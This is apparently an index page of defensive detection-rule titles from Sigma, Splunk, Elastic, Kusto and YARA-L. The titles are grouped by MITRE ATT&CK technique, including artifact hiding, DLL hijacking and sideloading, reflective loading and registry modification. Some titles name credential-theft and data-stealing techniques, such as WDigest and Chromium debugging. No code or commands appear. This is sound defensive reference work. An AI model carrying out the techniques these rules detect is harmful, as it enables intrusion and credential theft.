- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
- Kusto Malware in the recycle bin available
- Kusto Malware in the recycle bin (Normalized Process Events)
- Sigma NTFS Alternate Data Stream test
- Splunk Parent in Public Folder Suspicious Process (Sysmon)
- Splunk Parent in Public Folder Suspicious Process (Windows Event Log)
- Elastic Persistence via Hidden Run Key Detected production
- Sigma Potential Data Stealing Via Chromium Headless Debugging test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI test
- Sigma Potential Rundll32 Execution With DLL Stored In ADS test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potentially Suspicious Execution From Parent Process In Public Folder test
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk PowerShell Hidden Window (PowerShell)
- Splunk PowerShell Hidden Window (Windows Event Log)
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Sigma Powershell Store File In Alternate Data Stream test
- Sigma PrintBrm ZIP Creation of Extraction test
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - Process Hacker Execution test
- Sigma PUA - System Informer Execution test
- Sigma Registry Persistence via Service in Safe Mode test
- Sigma Remote File Download Via Findstr.EXE test
- Sigma Run PowerShell Script from ADS test
- Elastic Service DACL Modification via sc.exe production
- Sigma Set Files as System Files Using Attrib.EXE test
- Sigma Set Suspicious Files as System Files Using Attrib.EXE test
- Sigma Suspicious Creation with Colorcpl test
- Sigma Suspicious Diantz Alternate Data Stream Execution test
- Sigma Suspicious Executable File Creation test
- Sigma Suspicious Extrac32 Alternate Data Stream Execution test
- Sigma Suspicious File Download From File Sharing Websites - File Stream test
- Sigma Suspicious Hyper-V Cmdlets test
- Sigma Suspicious PowerShell WindowStyle Option test
- Sigma Sysmon Configuration Error test
- Sigma Sysmon Configuration Modification test
- Elastic Unusual File Creation - Alternate Data Stream production
- Sigma Unusual File Download from Direct IP Address test
- Sigma Unusual File Download From File Sharing Websites - File Stream test
- Elastic Unusual Process Execution Path - Alternate Data Stream production
- Sigma Use Icacls to Hide File to Everyone test
- Sigma Use NTFS Short Name in Command Line test
- Sigma Use NTFS Short Name in Image test
- Sigma Use Short Name Path in Command Line test
- Sigma Use Short Name Path in Image test
- Sigma Virtualbox Driver Installation or Starting of VMs test
- Splunk Windows Alternate DataStream - Base64 Content production
- Splunk Windows Alternate DataStream - Executable Content production
- Splunk Windows Alternate DataStream - Process Execution production
- Splunk Windows ConHost with Headless Argument production
- Splunk Windows New Deny Permission Set On Service SD Via Sc.EXE production
- Splunk Windows New Service Security Descriptor Set Via Sc.EXE production
- Elastic Windows Sandbox with Sensitive Configuration production
- Sigma Windows Subsystem for Linux (WSL) installation (command) experimental
- Sigma Windows Subsystem for Linux (WSL) installation (PowerShell) experimental
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows SymbolicLink-Testing-Tools Utility Execution production
Hide Artifacts: Hidden Files and Directories T1564.001 11 rules
- Elastic Adding Hidden File Attribute via Attrib production
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Disable Show Hidden Files production
- Sigma Displaying Hidden Files Feature Disabled test
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma Hiding Files with Attrib.exe test
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Sigma Registry Persistence via Service in Safe Mode test
- Sigma Set Files as System Files Using Attrib.EXE test
- Sigma Set Suspicious Files as System Files Using Attrib.EXE test
- Sigma Use Icacls to Hide File to Everyone test
Hide Artifacts: Hidden Users T1564.002 6 rules
- Elastic Creation of a Hidden Local User Account production
- Splunk Hidden User Created - Windows (Sysmon)
- Splunk Hidden User Created - Windows (Windows Event Log)
- Sigma Hiding User Account Via SpecialAccounts Registry Key test
- Sigma Hiding User Account Via SpecialAccounts Registry Key - CommandLine test
- Sigma Potential Suspicious Activity Using SeCEdit test
Hide Artifacts: Hidden Window T1564.003 13 rules
- Sigma Browser Execution In Headless Mode test
- Sigma Cmd Launched with Hidden Start Flags to Suspicious Targets experimental
- Sigma File Download with Headless Browser test
- Sigma HackTool - Covenant PowerShell Launcher test
- Splunk Headless Browser Mockbin or Mocky Request production
- Splunk Headless Browser Usage production
- Sigma Potential Data Stealing Via Chromium Headless Debugging test
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk PowerShell Hidden Window (PowerShell)
- Splunk PowerShell Hidden Window (Windows Event Log)
- Sigma PUA - AdvancedRun Execution test
- Sigma Suspicious PowerShell WindowStyle Option test
- Splunk Windows ConHost with Headless Argument production
Hide Artifacts: NTFS File Attributes T1564.004 33 rules
- Elastic Alternate Data Stream Creation/Execution at Volume Root Directory production
- Sigma Execute From Alternate Data Streams test
- Splunk Expand.exe Execution (PowerShell)
- Splunk Expand.exe Execution (Sysmon)
- Splunk Expand.exe Execution (Windows Event Log)
- Sigma Exports Registry Key To an Alternate Data Stream test
- Sigma HackTool Named File Stream Created test
- Sigma Hidden Executable In NTFS Alternate Data Stream test
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Sigma NTFS Alternate Data Stream test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream test
- Sigma Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI test
- Sigma Potential Rundll32 Execution With DLL Stored In ADS test
- Sigma Powershell Store File In Alternate Data Stream test
- Sigma PrintBrm ZIP Creation of Extraction test
- Sigma Remote File Download Via Findstr.EXE test
- Sigma Run PowerShell Script from ADS test
- Sigma Suspicious Diantz Alternate Data Stream Execution test
- Sigma Suspicious Extrac32 Alternate Data Stream Execution test
- Sigma Suspicious File Download From File Sharing Websites - File Stream test
- Elastic Unusual File Creation - Alternate Data Stream production
- Sigma Unusual File Download from Direct IP Address test
- Sigma Unusual File Download From File Sharing Websites - File Stream test
- Elastic Unusual Process Execution Path - Alternate Data Stream production
- Sigma Use NTFS Short Name in Command Line test
- Sigma Use NTFS Short Name in Image test
- Sigma Use Short Name Path in Command Line test
- Sigma Use Short Name Path in Image test
- Splunk Windows Alternate DataStream - Base64 Content production
- Splunk Windows Alternate DataStream - Executable Content production
- Splunk Windows Alternate DataStream - Process Execution production
- Splunk Windows SymbolicLink-Testing-Tools Utility Execution production
Hide Artifacts: Run Virtual Instance T1564.006 8 rules
- Sigma Detection of default a Windows host name in login attempts experimental
- Sigma Suspicious Hyper-V Cmdlets test
- Sigma Virtualbox Driver Installation or Starting of VMs test
- Splunk Windows ConHost with Headless Argument production
- Elastic Windows Sandbox with Sensitive Configuration production
- Sigma Windows Subsystem for Linux (WSL) installation (command) experimental
- Sigma Windows Subsystem for Linux (WSL) installation (PowerShell) experimental
- Splunk Windows Suspicious QEMU Execution production
Hide Artifacts: Email Hiding Rules T1564.008 2 rules
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
Hijack Execution Flow T1574 183 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Kusto COM Registry Key Modified to Point to File in Color Profile Folder
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Adobe Hijack Persistence production
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Sigma DLL Execution Via Register-cimprovider.exe test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Enabling COR Profiler Environment Variables test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Sigma Fax Service DLL Search Order Hijack test
- Splunk GitHub Workflow File Creation or Modification production
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Sigma Potential PlugX Activity test
- Sigma Potential PrintNightmare Exploitation Attempt test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential Registry Persistence Attempt Via DbgManagedDebugger test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry-Free Process Scope COR_PROFILER test
- Sigma Regsvr32 DLL Execution With Uncommon Extension test
- Sigma Renamed Vmnat.exe Execution test
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Setup16.EXE Execution With Custom .Lst File test
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware CommandLine Indicator test
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Sigma Suspicious Printer Driver Empty Manufacturer test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Elastic Unusual Persistence via Services Registry production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows BitDefender Submission Wizard DLL Sideloading experimental
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows Potential AppDomainManager Hijack Artifacts Creation production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows Rundll32 Execution With Log.DLL production
- Splunk Windows Service Creation Using Registry Entry production
- Splunk Windows Set Custom DNS ServerLevelPlugin Via Dnscmd production
- Sigma Windows Spooler Service Suspicious Binary Load test
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL T1574.001 118 rules
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Fax Service DLL Search Order Hijack test
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential PlugX Activity test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Renamed Vmnat.exe Execution test
- Sigma Small Sieve Malware CommandLine Indicator test
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL Side-Loading T1574.002 10 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Hijack Execution Flow: Dylib Hijacking T1574.004 1 rule
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Executable Installer File Permissions Weakness T1574.005 2 rules
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma Setup16.EXE Execution With Custom .Lst File test
Hijack Execution Flow: Dynamic Linker Hijacking T1574.006 2 rules
- Splunk GitHub Workflow File Creation or Modification production
- Splunk Shai-Hulud Workflow File Creation or Modification production
Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 5 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
Hijack Execution Flow: Path Interception by Search Order Hijacking T1574.008 6 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
Hijack Execution Flow: Path Interception by Unquoted Path T1574.009 4 rules
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Services File Permissions Weakness T1574.010 6 rules
- Elastic Deprecated - Adobe Hijack Persistence production
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
Hijack Execution Flow: Services Registry Permissions Weakness T1574.011 17 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Splunk Windows Service Creation Using Registry Entry production
Hijack Execution Flow: COR_PROFILER T1574.012 2 rules
- Sigma Enabling COR Profiler Environment Variables test
- Sigma Registry-Free Process Scope COR_PROFILER test
Hijack Execution Flow: AppDomainManager T1574.014 1 rule
- Splunk Windows Potential AppDomainManager Hijack Artifacts Creation production
Reflective Code Loading T1620 4 rules
- Sigma Potential In-Memory Execution Using Reflection.Assembly test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Windows MMC Loaded Script Engine DLL production
Debugger Evasion T1622 1 rule
- Sigma PUA - Process Hacker Execution test
Defense Impairment
Modify Registry T1112 251 rules
- Sigma Activate Suppression of Windows Security Center Notifications test
- Sigma Add DisallowRun Execution to Registry test
- Sigma Allow RDP Remote Assistance Feature test
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Blackbyte Ransomware Registry test
- YARA-L Blackbyte Ransomware Registry
- Sigma Blue Mockingbird test
- Sigma Blue Mockingbird - Registry test
- Sigma Change the Fax Dll test
- Sigma Change User Account Associated with the FAX Service test
- Sigma ClickOnce Trust Prompt Tampering test
- Elastic Code Signing Policy Modification Through Registry production
- Elastic Component Object Model Hijacking production
- Sigma CrashControl CrashDump Disabled test
- Sigma CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry test
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma DHCP Callout DLL Installation test
- Sigma Disable Internal Tools or Feature in Registry test
- YARA-L Disable Internal Tools or Feature in Registry
- Splunk Disable Registry Tool production
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Splunk Disable Security Logs Using MiniNt Registry production
- Splunk Disable Show Hidden Files production
- Splunk Disable Windows App Hotkeys production
- Sigma Disable Windows Security Center Notifications test
- Splunk Disabling CMD Application production
- Splunk Disabling ControlPanel production
- Elastic Disabling Lsa Protection via Registry Modification production
- Splunk Disabling NoRun Windows App production
- Elastic Disabling User Account Control via Registry Modification production
- Elastic DNS Global Query Block List Modified or Disabled production
- Sigma DNS-over-HTTPS Enabled by Registry test
- Elastic DNS-over-HTTPS Enabled via Registry production
- Sigma Enable LM Hash Storage test
- Sigma Enable LM Hash Storage - ProcCreation test
- Splunk Enable WDigest UseLogonCredential Registry production
